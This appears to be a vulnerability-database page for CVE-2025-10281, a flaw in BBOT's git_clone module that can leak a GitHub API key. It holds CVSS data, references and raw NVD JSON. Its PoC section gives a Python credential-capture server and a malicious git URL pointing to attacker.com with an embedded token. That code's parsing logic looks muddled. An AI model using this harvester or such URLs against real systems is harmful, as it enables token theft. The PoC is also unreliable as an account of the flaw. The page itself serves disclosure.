CVE-2025-10281

Description

BBOT's git_clone module could be abused to disclose a GitHub API key to an attacker controlled server with a malicious formatted git URL.

CVSS Details

CVSS Score

4.7

Severity

MEDIUM

CVSS Vector

CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:N/A:N

Configurations (Affected Products)

No configuration data available.

BBOT git_clone模块的所有受影响版本（建议升级到最新修复版本）

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

# CVE-2025-10281 - BBOT git_clone Module GitHub API Key Disclosure PoC # Attacker sets up a listener to capture leaked credentials # Step 1: Set up an attacker-controlled server to log incoming requests # Using a simple netcat listener or HTTP server import http.server import socketserver import sys class CredentialCaptureHandler(http.server.BaseHTTPRequestHandler): def do_GET(self): # Log the full URL including any embedded credentials print(f"[CAPTURED] Path: {self.path}") print(f"[CAPTURED] Headers: {self.headers}") # Extract credentials from URL (format: https://[email protected]/...) if "@" in self.path: creds = self.path.split("@")[0].lstrip("/") print(f"[LEAKED CREDENTIALS] {creds}") self.send_response(200) self.end_headers() self.wfile.write(b"OK") def log_message(self, format, *args): pass # Suppress default logging # Step 2: Attacker places a malicious git URL in a location BBOT will crawl # The malicious URL redirects or points to attacker server while # containing the GitHub API token malicious_url = "https://x-access-token:[email protected]/fake-repo.git" # Step 3: When BBOT's git_clone module processes this URL, it will # send the request to attacker.com with the embedded token # The attacker captures the token in their server logs print(f"[*] Malicious URL: {malicious_url}") print("[*] Starting credential capture server on port 80...") # Uncomment to start the capture server # with socketserver.TCPServer(("", 80), CredentialCaptureHandler) as httpd: # httpd.serve_forever()

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2025-10281
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2025-10281
[3] CVE Details https://www.cvedetails.com/cve/CVE-2025-10281/
[4] VulDB https://vuldb.com/cve/CVE-2025-10281
[5] https://blog.blacklanternsecurity.com/p/bbot-security-advisory-gitdumper

Raw JSON Data

JSON

{"cve": {"id": "CVE-2025-10281", "sourceIdentifier": "[email protected]", "published": "2025-10-09T16:15:42.807", "lastModified": "2026-04-15T00:35:42.020", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "BBOT's git_clone module could be abused to disclose a GitHub API key to an attacker controlled server with a malicious formatted git URL."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:N/A:N", "baseScore": 4.7, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "REQUIRED", "scope": "CHANGED", "confidentialityImpact": "LOW", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 1.4}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-200"}]}], "references": [{"url": "https://blog.blacklanternsecurity.com/p/bbot-security-advisory-gitdumper", "source": "[email protected]"}]}}